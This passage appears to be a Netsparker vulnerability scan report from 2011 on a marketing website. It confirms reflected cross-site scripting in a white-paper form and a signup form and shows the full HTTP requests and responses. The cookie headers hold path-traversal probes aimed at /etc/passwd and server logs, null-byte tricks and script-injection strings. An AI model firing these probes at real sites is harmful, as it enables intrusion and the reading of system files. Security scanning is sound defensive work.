solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="'"--></style></script><script>netsparker(0x0011CA)</script>"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <i..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST '"--></style></script><script>alert(0x001228)</script>

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001228)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:40:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=87DF53D1E9028AEE4C2DE8A9A419204F; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="'"--></style></script><script>netsparker(0x001228)</script>"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST '"--></style></script><script>alert(0x0012F8)</script>
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 